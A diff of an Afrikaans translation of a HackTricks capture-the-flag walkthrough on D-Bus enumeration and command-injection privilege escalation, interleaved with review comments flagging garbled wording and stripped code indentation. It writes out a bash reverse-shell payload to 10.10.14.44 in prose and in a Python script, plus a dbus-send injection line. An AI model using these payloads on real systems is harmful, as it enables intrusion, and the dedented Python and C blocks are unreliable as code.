+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
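Review bot: "een van daardie images uit de waarin die gasheer se hoofmap gekoppel word" in the containerd `@@ -24,38 +24,30 @@` hunk is garbled ("uit de waarin" is not Afrikaans) and switches terms within the hunk ("beelde" two lines earlier, "images" here). Suggest "En voer dan **een van daardie beelde uit met die gasheer se hoofmap daarin gekoppel**:". Removing the stray leading space in `- ctr run --privileged ...` / `+ctr run --privileged ...` is a genuine fix and fine to keep.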
diff --git a/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md b/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md index fe6c1de8b..99c712f58 100644 --- a/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md @@ -1,84 +1,79 @@ -# D-Bus Enumeration & Command Injection Privilege Escalation +# D-Bus Enumerasie & Opdraginspuiting Privilege Escalation
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **GUI enumeration** +## **GUI enumerasie** -D-Bus is utilized as the inter-process communications (IPC) mediator in Ubuntu desktop environments. On Ubuntu, the concurrent operation of several message buses is observed: the system bus, primarily utilized by **privileged services to expose services relevant across the system**, and a session bus for each logged-in user, exposing services relevant only to that specific user. The focus here is primarily on the system bus due to its association with services running at higher privileges (e.g., root) as our objective is to elevate privileges. It is noted that D-Bus's architecture employs a 'router' per session bus, which is responsible for redirecting client messages to the appropriate services based on the address specified by the clients for the service they wish to communicate with. +D-Bus word gebruik as die interproseskommunikasie (IPC)-bemiddelaar in Ubuntu-desktopomgewings. Op Ubuntu word die gelyktydige werking van verskeie boodskapbusse waargeneem: die stelselbus, hoofsaaklik gebruik deur **bevoorregte dienste om dienste bloot te stel wat relevant is vir die hele stelsel**, en 'n sessiebus vir elke ingeteken gebruiker, wat slegs dienste blootstel wat slegs vir daardie spesifieke gebruiker relevant is. Die fokus hier is hoofsaaklik op die stelselbus as gevolg van sy assosiasie met dienste wat met hoër bevoegdhede (bv. root) loop, aangesien ons doel is om bevoegdhede te verhoog. Daar word opgemerk dat D-Bus se argitektuur 'n 'roeteerder' per sessiebus gebruik, wat verantwoordelik is vir die omleiding van kliëntboodskappe na die toepaslike dienste op grond van die adres wat deur die kliënte vir die diens waarmee hulle wil kommunikeer, gespesifiseer word. -Services on D-Bus are defined by the **objects** and **interfaces** they expose. Objects can be likened to class instances in standard OOP languages, with each instance uniquely identified by an **object path**. 
This path, akin to a filesystem path, uniquely identifies each object exposed by the service. A key interface for research purposes is the **org.freedesktop.DBus.Introspectable** interface, featuring a singular method, Introspect. This method returns an XML representation of the object's supported methods, signals, and properties, with a focus here on methods while omitting properties and signals. - -For communication with the D-Bus interface, two tools were employed: a CLI tool named **gdbus** for easy invocation of methods exposed by D-Bus in scripts, and [**D-Feet**](https://wiki.gnome.org/Apps/DFeet), a Python-based GUI tool designed to enumerate the services available on each bus and to display the objects contained within each service. +Dienste op D-Bus word gedefinieer deur die **voorwerpe** en **koppelvlakke** wat hulle blootstel. Voorwerpe kan vergelyk word met klasinstansies in standaard OOP-tale, waar elke instansie uniek geïdentifiseer word deur 'n **voorwerppad**. Hierdie pad, soortgelyk aan 'n lêerstelselpad, identifiseer elke voorwerp wat deur die diens blootgestel word. 'n Sleutelkoppelvlak vir navorsingsdoeleindes is die **org.freedesktop.DBus.Introspectable**-koppelvlak, met 'n enkele metode, Introspect. Hierdie metode gee 'n XML-voorstelling van die ondersteunde metodes, seine en eienskappe van die voorwerp, met 'n fokus hier op metodes terwyl eienskappe en seine weggelaat word. +Vir kommunikasie met die D-Bus-koppelvlak is twee hulpmiddels gebruik: 'n CLI-hulpmiddel genaamd **gdbus** vir maklike aanroeping van metodes wat deur D-Bus in skripte blootgestel word, en [**D-Feet**](https://wiki.gnome.org/Apps/DFeet), 'n op Python gebaseerde GUI-hulpmiddel wat ontwerp is om die beskikbare dienste op elke bus te ondersoek en die voorwerpe wat in elke diens vervat is, te vertoon. 
```bash sudo apt-get install d-feet ``` - ![https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-21.png](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-21.png) ![https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png) -In the first image services registered with the D-Bus system bus are shown, with **org.debin.apt** specifically highlighted after selecting the System Bus button. D-Feet queries this service for objects, displaying interfaces, methods, properties, and signals for chosen objects, seen in the second image. Each method's signature is also detailed. +In die eerste prentjie word dienste wat geregistreer is by die D-Bus stelselbus gewys, met **org.debin.apt** spesifiek uitgelig nadat die System Bus-knoppie gekies is. D-Feet ondervra hierdie diens vir voorwerpe en wys die koppelvlakke, metodes, eienskappe en seine vir gekose voorwerpe, soos gesien in die tweede prentjie. Die handtekening van elke metode word ook beskryf. -A notable feature is the display of the service's **process ID (pid)** and **command line**, useful for confirming if the service runs with elevated privileges, important for research relevance. +'n Noemenswaardige kenmerk is die vertoning van die diens se **proses-ID (pid)** en **opdraglyn**, wat nuttig is om te bevestig of die diens met verhoogde bevoegdhede loop, wat belangrik is vir navorsingsdoeleindes. -**D-Feet also allows method invocation**: users can input Python expressions as parameters, which D-Feet converts to D-Bus types before passing to the service. +**D-Feet maak ook metode-aanroeping moontlik**: gebruikers kan Python-uitdrukkings as parameters invoer, wat D-Feet omskakel na D-Bus-tipes voordat dit aan die diens oorgedra word. -However, note that **some methods require authentication** before allowing us to invoke them. 
We will ignore these methods, since our goal is to elevate our privileges without credentials in the first place. +Let egter daarop dat **sommige metodes verifikasie vereis** voordat ons dit kan aanroep. Ons sal hierdie metodes ignoreer, aangesien ons doel is om ons bevoegdhede te verhoog sonder legitimasie in die eerste plek. -Also note that some of the services query another D-Bus service named org.freedeskto.PolicyKit1 whether a user should be allowed to perform certain actions or not. +Let ook daarop dat sommige van die dienste 'n ander D-Bus-diens, genaamd org.freedeskto.PolicyKit1, ondervra of 'n gebruiker toegelaat moet word om sekere aksies uit te voer of nie. -## **Cmd line Enumeration** +## **Opdraglynopname** -### List Service Objects - -It's possible to list opened D-Bus interfaces with: +### Lys Diensvoorwerpe +Dit is moontlik om geopende D-Bus-koppelvlakke te lys met: ```bash busctl list #List D-Bus interfaces NAME PID PROCESS USER CONNECTION UNIT SE -:1.0 1 systemd root :1.0 init.scope - +:1.0 1 systemd root :1.0 init.scope - :1.1345 12817 busctl qtc :1.1345 session-729.scope 72 -:1.2 1576 systemd-timesyn systemd-timesync :1.2 systemd-timesyncd.service - -:1.3 2609 dbus-server root :1.3 dbus-server.service - -:1.4 2606 wpa_supplicant root :1.4 wpa_supplicant.service - -:1.6 2612 systemd-logind root :1.6 systemd-logind.service - -:1.8 3087 unattended-upgr root :1.8 unattended-upgrades.serv… - -:1.820 6583 systemd qtc :1.820 user@1000.service - -com.ubuntu.SoftwareProperties - - - (activatable) - - -fi.epitest.hostap.WPASupplicant 2606 wpa_supplicant root :1.4 wpa_supplicant.service - -fi.w1.wpa_supplicant1 2606 wpa_supplicant root :1.4 wpa_supplicant.service - -htb.oouch.Block 2609 dbus-server root :1.3 dbus-server.service - -org.bluez - - - (activatable) - - -org.freedesktop.DBus 1 systemd root - init.scope - -org.freedesktop.PackageKit - - - (activatable) - - -org.freedesktop.PolicyKit1 - - - (activatable) - - -org.freedesktop.hostname1 - - - 
(activatable) - - -org.freedesktop.locale1 - - - (activatable) - - +:1.2 1576 systemd-timesyn systemd-timesync :1.2 systemd-timesyncd.service - +:1.3 2609 dbus-server root :1.3 dbus-server.service - +:1.4 2606 wpa_supplicant root :1.4 wpa_supplicant.service - +:1.6 2612 systemd-logind root :1.6 systemd-logind.service - +:1.8 3087 unattended-upgr root :1.8 unattended-upgrades.serv… - +:1.820 6583 systemd qtc :1.820 user@1000.service - +com.ubuntu.SoftwareProperties - - - (activatable) - - +fi.epitest.hostap.WPASupplicant 2606 wpa_supplicant root :1.4 wpa_supplicant.service - +fi.w1.wpa_supplicant1 2606 wpa_supplicant root :1.4 wpa_supplicant.service - +htb.oouch.Block 2609 dbus-server root :1.3 dbus-server.service - +org.bluez - - - (activatable) - - +org.freedesktop.DBus 1 systemd root - init.scope - +org.freedesktop.PackageKit - - - (activatable) - - +org.freedesktop.PolicyKit1 - - - (activatable) - - +org.freedesktop.hostname1 - - - (activatable) - - +org.freedesktop.locale1 - - - (activatable) - - ``` +#### Verbindings -#### Connections +[Vanaf Wikipedia:](https://af.wikipedia.org/wiki/D-Bus) Wanneer 'n proses 'n verbinding met 'n bus opstel, ken die bus aan die verbinding 'n spesiale busnaam toe wat 'n _unieke verbindingsnaam_ genoem word. Busname van hierdie tipe is onveranderlik - dit word gewaarborg dat dit nie sal verander solank die verbinding bestaan nie - en, belangriker nog, dit kan nie gedurende die leeftyd van die bus hergebruik word nie. Dit beteken dat geen ander verbinding met daardie bus ooit so 'n unieke verbindingsnaam sal hê nie, selfs as dieselfde proses die verbinding met die bus afsluit en 'n nuwe een skep. Unieke verbindingsname is maklik herkenbaar omdat hulle begin met die - andersins verbode - kolonkarakter. -[From wikipedia:](https://en.wikipedia.org/wiki/D-Bus) When a process sets up a connection to a bus, the bus assigns to the connection a special bus name called _unique connection name_. 
Bus names of this type are immutable—it's guaranteed they won't change as long as the connection exists—and, more importantly, they can't be reused during the bus lifetime. This means that no other connection to that bus will ever have assigned such unique connection name, even if the same process closes down the connection to the bus and creates a new one. Unique connection names are easily recognizable because they start with the—otherwise forbidden—colon character. - -### Service Object Info - -Then, you can obtain some information about the interface with: +### Diensobjekinligting +Dan kan jy enkele inligting oor die koppelvlak verkry met: ```bash busctl status htb.oouch.Block #Get info of "htb.oouch.Block" interface 
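Review bot: the typo `org.freedeskto.PolicyKit1` in the sentence "Let ook daarop dat sommige van die dienste 'n ander D-Bus-diens, genaamd org.freedeskto.PolicyKit1, ondervra" is carried over from the English original; the `busctl list` output in this same hunk shows the real name, `org.freedesktop.PolicyKit1`, so the translated line should use that. Two further points in this hunk: the Wikipedia citation was retargeted from `https://en.wikipedia.org/wiki/D-Bus` to `https://af.wikipedia.org/wiki/D-Bus`, but the quoted paragraph is a translation of the English article, so the link should keep pointing at the English source (the Afrikaans page may not exist or may not contain this text); and every line of the `busctl list` output block is removed and re-added with no visible text change, which means column whitespace was altered inside quoted program output. Output inside code fences should be copied through byte for byte.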
@@ -106,55 +101,51 @@ Session=n/a AuditLoginUID=n/a AuditSessionID=n/a UniqueName=:1.3 -EffectiveCapabilities=cap_chown cap_dac_override cap_dac_read_search - cap_fowner cap_fsetid cap_kill cap_setgid - cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service - cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock - cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot - cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot - cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config - cap_mknod cap_lease cap_audit_write cap_audit_control - cap_setfcap cap_mac_override cap_mac_admin cap_syslog - cap_wake_alarm cap_block_suspend cap_audit_read -PermittedCapabilities=cap_chown cap_dac_override cap_dac_read_search - cap_fowner cap_fsetid cap_kill cap_setgid - cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service - cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock - cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot - cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot - cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config - cap_mknod cap_lease cap_audit_write cap_audit_control - cap_setfcap cap_mac_override cap_mac_admin cap_syslog - cap_wake_alarm cap_block_suspend cap_audit_read +EffectiveCapabilities=cap_chown cap_dac_override cap_dac_read_search +cap_fowner cap_fsetid cap_kill cap_setgid +cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service +cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock +cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot +cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot +cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config +cap_mknod cap_lease cap_audit_write cap_audit_control +cap_setfcap cap_mac_override cap_mac_admin cap_syslog +cap_wake_alarm cap_block_suspend cap_audit_read +PermittedCapabilities=cap_chown cap_dac_override cap_dac_read_search +cap_fowner cap_fsetid cap_kill cap_setgid +cap_setuid cap_setpcap cap_linux_immutable 
cap_net_bind_service +cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock +cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot +cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot +cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config +cap_mknod cap_lease cap_audit_write cap_audit_control +cap_setfcap cap_mac_override cap_mac_admin cap_syslog +cap_wake_alarm cap_block_suspend cap_audit_read InheritableCapabilities= -BoundingCapabilities=cap_chown cap_dac_override cap_dac_read_search - cap_fowner cap_fsetid cap_kill cap_setgid - cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service - cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock - cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot - cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot - cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config - cap_mknod cap_lease cap_audit_write cap_audit_control - cap_setfcap cap_mac_override cap_mac_admin cap_syslog - cap_wake_alarm cap_block_suspend cap_audit_read +BoundingCapabilities=cap_chown cap_dac_override cap_dac_read_search +cap_fowner cap_fsetid cap_kill cap_setgid +cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service +cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock +cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot +cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot +cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config +cap_mknod cap_lease cap_audit_write cap_audit_control +cap_setfcap cap_mac_override cap_mac_admin cap_syslog +cap_wake_alarm cap_block_suspend cap_audit_read ``` +### Lys van Intervlakke van 'n Diensvoorwerp -### List Interfaces of a Service Object - -You need to have enough permissions. - +Jy moet genoeg toestemmings hê. 
```bash busctl tree htb.oouch.Block #Get Interfaces of the service object └─/htb - └─/htb/oouch - └─/htb/oouch/Block +└─/htb/oouch +└─/htb/oouch/Block ``` +### Introspekteer die koppelvlak van 'n Diensvoorwerp -### Introspect Interface of a Service Object - -Note how in this example it was selected the latest interface discovered using the `tree` parameter (_see previous section_): - +Merk op hoe in hierdie voorbeeld die nuutste koppelvlak wat ontdek is, gekies is deur die `tree` parameter te gebruik (_sien vorige afdeling_): ```bash busctl introspect htb.oouch.Block /htb/oouch/Block #Get methods of the interface 
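Review bot: the leading indentation of the quoted program output was stripped in both code blocks of this hunk, for example `- cap_fowner cap_fsetid cap_kill cap_setgid` became `+cap_fowner cap_fsetid cap_kill cap_setgid` in the `busctl status` continuation lines, and `- └─/htb/oouch` became `+└─/htb/oouch` in the `busctl tree` output, which flattens the tree drawing so the object hierarchy is no longer readable. These blocks contain no translatable text, so the change is pure noise; restore the original lines verbatim.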
@@ -172,60 +163,52 @@ org.freedesktop.DBus.Properties interface - - - .Set method ssv - - .PropertiesChanged signal sa{sv}as - - ``` +Merk die metode `.Block` van die koppelvlak `htb.oouch.Block` (die een waarin ons belangstel). Die "s" van die ander kolomme mag beteken dat dit 'n string verwag. -Note the method `.Block` of the interface `htb.oouch.Block` (the one we are interested in). The "s" of the other columns may mean that it's expecting a string. +### Monitor/Vaslegging Koppelvlak -### Monitor/Capture Interface +Met genoeg bevoegdhede (net `send_destination` en `receive_sender` bevoegdhede is nie genoeg nie) kan jy 'n D-Bus kommunikasie **monitor**. -With enough privileges (just `send_destination` and `receive_sender` privileges aren't enough) you can **monitor a D-Bus communication**. - -In order to **monitor** a **communication** you will need to be **root.** If you still find problems being root check [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) and [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus) +Om 'n **kommunikasie te monitor**, moet jy **root** wees. As jy steeds probleme ondervind om root te wees, kyk na [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) en [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus) {% hint style="warning" %} -If you know how to configure a D-Bus config file to **allow non root users to sniff** the communication please **contact me**! +As jy weet hoe om 'n D-Bus konfigurasie lêer te konfigureer om **nie-root gebruikers toe te laat om die kommunikasie te snuffel nie**, kontak my asseblief! 
{% endhint %} -Different ways to monitor: - +Verskillende maniere om te monitor: ```bash sudo busctl monitor htb.oouch.Block #Monitor only specified sudo busctl monitor #System level, even if this works you will only see messages you have permissions to see sudo dbus-monitor --system #System level, even if this works you will only see messages you have permissions to see ``` - -In the following example the interface `htb.oouch.Block` is monitored and **the message "**_**lalalalal**_**" is sent through miscommunication**: - +In die volgende voorbeeld word die koppelvlak `htb.oouch.Block` gemonitor en **die boodskap "**_**lalalalal**_**" word deur misverstand gestuur**: ```bash busctl monitor htb.oouch.Block Monitoring bus message stream. ‣ Type=method_call Endian=l Flags=0 Version=1 Priority=0 Cookie=2 - Sender=:1.1376 Destination=htb.oouch.Block Path=/htb/oouch/Block Interface=htb.oouch.Block Member=Block - UniqueName=:1.1376 - MESSAGE "s" { - STRING "lalalalal"; - }; +Sender=:1.1376 Destination=htb.oouch.Block Path=/htb/oouch/Block Interface=htb.oouch.Block Member=Block +UniqueName=:1.1376 +MESSAGE "s" { +STRING "lalalalal"; +}; ‣ Type=method_return Endian=l Flags=1 Version=1 Priority=0 Cookie=16 ReplyCookie=2 - Sender=:1.3 Destination=:1.1376 - UniqueName=:1.3 - MESSAGE "s" { - STRING "Carried out :D"; - }; +Sender=:1.3 Destination=:1.1376 +UniqueName=:1.3 +MESSAGE "s" { +STRING "Carried out :D"; +}; ``` +Jy kan `capture` gebruik in plaas van `monitor` om die resultate in 'n pcap-lêer te stoor. -You can use `capture` instead of `monitor` to save the results in a pcap file. - -#### Filtering all the noise - -If there is just too much information on the bus, pass a match rule like so: +#### Filtrering van al die geraas +As daar net te veel inligting op die bus is, stel 'n ooreenstemmingsreël soos volg voor: ```bash dbus-monitor "type=signal,sender='org.gnome.TypingMonitor',interface='org.gnome.TypingMonitor'" ``` - -Multiple rules can be specified. 
If a message matches _any_ of the rules, the message will be printed. Like so: - +Verskeie reëls kan gespesifiseer word. As 'n boodskap aan _enige_ van die reëls voldoen, sal die boodskap gedruk word. Soos volg: ```bash dbus-monitor "type=error" "sender=org.freedesktop.SystemToolsBackends" ``` 
@@ -233,83 +216,73 @@ dbus-monitor "type=error" "sender=org.freedesktop.SystemToolsBackends" ```bash dbus-monitor "type=method_call" "type=method_return" "type=error" ``` +Sien die [D-Bus dokumentasie](http://dbus.freedesktop.org/doc/dbus-specification.html) vir meer inligting oor die sintaksis van ooreenstemmingsreëls. -See the [D-Bus documentation](http://dbus.freedesktop.org/doc/dbus-specification.html) for more information on match rule syntax. +### Meer -### More +`busctl` het selfs meer opsies, [**vind almal hier**](https://www.freedesktop.org/software/systemd/man/busctl.html). -`busctl` has even more options, [**find all of them here**](https://www.freedesktop.org/software/systemd/man/busctl.html). - -## **Vulnerable Scenario** - -As user **qtc inside the host "oouch" from HTB** you can find an **unexpected D-Bus config file** located in _/etc/dbus-1/system.d/htb.oouch.Block.conf_: +## **Kwesbare Scenario** +As gebruiker **qtc binne die gasheer "oouch" van HTB**, kan jy 'n **onverwagte D-Bus konfigurasie-lêer** vind wat in _/etc/dbus-1/system.d/htb.oouch.Block.conf_ geleë is: ```xml +"-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN" +"http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd"> - - - + + + - - - - + + + + ``` +Nota van die vorige konfigurasie is dat **jy as die gebruiker `root` of `www-data` moet wees om inligting te stuur en ontvang** via hierdie D-BUS kommunikasie. -Note from the previous configuration that **you will need to be the user `root` or `www-data` to send and receive information** via this D-BUS communication. - -As user **qtc** inside the docker container **aeb4525789d8** you can find some dbus related code in the file _/code/oouch/routes.py._ This is the interesting code: - +As gebruiker **qtc** binne die docker houer **aeb4525789d8** kan jy 'n paar dbus-verwante kode in die lêer _/code/oouch/routes.py_ vind. 
Hier is die interessante kode: ```python if primitive_xss.search(form.textfield.data): - bus = dbus.SystemBus() - block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block') - block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block') +bus = dbus.SystemBus() +block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block') +block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block') - client_ip = request.environ.get('REMOTE_ADDR', request.remote_addr) - response = block_iface.Block(client_ip) - bus.close() - return render_template('hacker.html', title='Hacker') +client_ip = request.environ.get('REMOTE_ADDR', request.remote_addr) +response = block_iface.Block(client_ip) +bus.close() +return render_template('hacker.html', title='Hacker') ``` +Soos u kan sien, is dit **verbind met 'n D-Bus-koppelvlak** en stuur die "client\_ip" na die **"Block" funksie**. -As you can see, it is **connecting to a D-Bus interface** and sending to the **"Block" function** the "client\_ip". +Aan die ander kant van die D-Bus-koppeling is daar 'n C-kompilasie-binêre wat loop. Hierdie kode is **aan die luister** in die D-Bus-koppeling **vir IP-adres en roep iptables aan via die `system`-funksie** om die gegewe IP-adres te blokkeer.\ +**Die oproep na `system` is opsetlik vatbaar vir opdraginspuiting**, so 'n lading soos die volgende sal 'n omgekeerde dop skep: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #` -In the other side of the D-Bus connection there is some C compiled binary running. This code is **listening** in the D-Bus connection **for IP address and is calling iptables via `system` function** to block the given IP address.\ -**The call to `system` is vulnerable on purpose to command injection**, so a payload like the following one will create a reverse shell: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #` - -### Exploit it - -At the end of this page you can find the **complete C code of the D-Bus application**. 
Inside of it you can find between the lines 91-97 **how the `D-Bus object path`** **and `interface name`** are **registered**. This information will be necessary to send information to the D-Bus connection: +### Exploiteer dit +Aan die einde van hierdie bladsy kan u die **volledige C-kode van die D-Bus-toepassing** vind. Binne-in kan u tussen die lyne 91-97 vind **hoe die `D-Bus-objectpad`** **en `koppelvlaknaam`** **geregistreer** word. Hierdie inligting sal nodig wees om inligting na die D-Bus-koppeling te stuur: ```c - /* Install the object */ - r = sd_bus_add_object_vtable(bus, - &slot, - "/htb/oouch/Block", /* interface */ - "htb.oouch.Block", /* service object */ - block_vtable, - NULL); +/* Install the object */ +r = sd_bus_add_object_vtable(bus, +&slot, +"/htb/oouch/Block", /* interface */ +"htb.oouch.Block", /* service object */ +block_vtable, +NULL); ``` - -Also, in line 57 you can find that **the only method registered** for this D-Bus communication is called `Block`(_**Thats why in the following section the payloads are going to be sent to the service object `htb.oouch.Block`, the interface `/htb/oouch/Block` and the method name `Block`**_): - +Ook, in lyn 57 kan jy vind dat **die enigste geregistreerde metode** vir hierdie D-Bus kommunikasie genoem word `Block`(_**Dit is hoekom die vullastelle in die volgende afdeling na die diensvoorwerp `htb.oouch.Block`, die koppelvlak `/htb/oouch/Block` en die metode naam `Block` gestuur gaan word**_): ```c SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED), ``` - #### Python -The following python code will send the payload to the D-Bus connection to the `Block` method via `block_iface.Block(runme)` (_note that it was extracted from the previous chunk of code_): - +Die volgende Python-kode sal die payload stuur na die D-Bus-verbinding na die `Block`-metode via `block_iface.Block(runme)` (_let wel dat dit uit die vorige stuk kode gehaal is_): ```python import dbus bus = dbus.SystemBus() 
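Review bot: the Python snippet in this hunk is now syntactically invalid: the body of `if primitive_xss.search(form.textfield.data):` (`+bus = dbus.SystemBus()` through `+return render_template('hacker.html', title='Hacker')`) was dedented to column 0, which raises an IndentationError and misrepresents the web application's code that the text below asks the reader to compare against. The same dedent was applied to the `sd_bus_add_object_vtable(...)` C fragment and to the ````xml` config block. Code fences should pass through a translation untouched; please restore the original indentation in all three blocks.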
@@ -319,23 +292,26 @@ runme = ";bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #" response = block_iface.Block(runme) bus.close() ``` +#### busctl en dbus-send -#### busctl and dbus-send +`busctl` is a command-line tool used to interact with the D-Bus system bus. It allows users to introspect and monitor the bus, as well as send method calls and signals to D-Bus services. +`dbus-send` is another command-line tool that can be used to send messages to D-Bus destinations. It can be used to invoke methods on D-Bus interfaces and send signals. + +Both `busctl` and `dbus-send` are powerful tools that can be used for enumeration and command injection during privilege escalation attacks. ```bash dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block string:';pring -c 1 10.10.14.44 #' ``` +* `dbus-send` is 'n hulpmiddel wat gebruik word om 'n boodskap na die "Message Bus" te stuur. +* Message Bus - 'n sagteware wat deur stelsels gebruik word om kommunikasie tussen programme maklik te maak. Dit is verwant aan 'n "Message Queue" (boodskappe word in volgorde geplaas), maar in 'n Message Bus word die boodskappe in 'n intekenmodel gestuur en is dit ook baie vinnig. +* Die "–system" etiket word gebruik om aan te dui dat dit 'n stelselboodskap is, nie 'n sessieboodskap (standaard). +* Die "–print-reply" etiket word gebruik om ons boodskap op die regte manier af te druk en enige antwoorde in 'n mensleesbare formaat te ontvang. +* "–dest=Dbus-Interface-Block" is die adres van die Dbus-interface. +* "–string:" - Die tipe boodskap wat ons na die interface wil stuur. Daar is verskeie formate om boodskappe te stuur, soos dubbel, bytes, booleans, int, objekpad. Van hierdie formate is die "objekpad" nuttig wanneer ons 'n pad van 'n lêer na die Dbus-interface wil stuur. In hierdie geval kan ons 'n spesiale lêer (FIFO) gebruik om 'n opdrag na die interface oor te dra in die naam van 'n lêer. 
"string:; " - Dit is om die objekpad weer te roep waar ons die FIFO-omkeer-skulpuntlêer/opdrag plaas. -* `dbus-send` is a tool used to send message to “Message Bus” -* Message Bus – A software used by systems to make communications between applications easily. It’s related to Message Queue (messages are ordered in sequence) but in Message Bus the messages are sending in a subscription model and also very quick. -* “-system” tag is used to mention that it is a system message, not a session message (by default). -* “–print-reply” tag is used to print our message appropriately and receives any replies in a human-readable format. -* “–dest=Dbus-Interface-Block” The address of the Dbus interface. -* “–string:” – Type of message we like to send to the interface. There are several formats of sending messages like double, bytes, booleans, int, objpath. Out of this, the “object path” is useful when we want to send a path of a file to the Dbus interface. We can use a special file (FIFO) in this case to pass a command to interface in the name of a file. “string:;” – This is to call the object path again where we place of FIFO reverse shell file/command. +Merk op dat in `htb.oouch.Block.Block` verwys die eerste deel (`htb.oouch.Block`) na die diensobjek en die laaste deel (`.Block`) na die metode se naam. -_Note that in `htb.oouch.Block.Block`, the first part (`htb.oouch.Block`) references the service object and the last part (`.Block`) references the method name._ - -### C code +### C-kode {% code title="d-bus_server.c" %} ```c 
